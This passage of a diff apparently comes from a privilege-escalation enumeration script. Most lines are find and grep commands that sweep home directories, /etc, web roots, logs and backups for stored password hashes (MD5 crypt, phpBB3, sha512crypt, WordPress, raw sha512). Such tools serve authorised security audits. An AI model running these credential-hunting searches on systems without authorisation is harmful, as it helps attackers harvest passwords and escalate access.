f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +print_3title_no_nl "Searching Linux MD5 (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching phpbb3 (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +print_3title_no_nl "Searching phpbb3 (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching sha512crypt (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & +print_3title_no_nl "Searching sha512crypt (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Wordpress (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +print_3title_no_nl "Searching Wordpress (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait echo '' print_2title "Searching Raw Hashes" -print_3title "Searching sha512 (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & +print_3title_no_nl "Searching sha512 (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not 